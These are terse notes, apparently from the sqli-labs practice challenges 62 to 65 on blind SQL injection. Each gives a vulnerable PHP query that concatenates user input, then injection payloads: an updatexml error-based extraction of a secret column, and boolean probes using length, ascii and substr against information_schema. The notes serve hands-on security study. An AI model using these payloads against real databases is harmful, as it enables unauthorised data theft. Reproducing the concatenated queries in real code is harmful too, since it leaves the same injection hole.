1')) and updatexml(1,concat(0x23,(select group_concat(secret_NSKU)from challenges.avy2e9297x)),1)%23
//8EhMs3hgKrmAcsmlJn4wVrSh

六十二  盲注
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
1') and length(database())=10 %23
challenges
1') and  ascii(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1))<101%23 

六十三 盲注
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and length(database())=10 %23

六十四 盲注
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
1))  and length(database())=10 %23
  
六十五 盲注
$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
1")  and length(database())=10 %23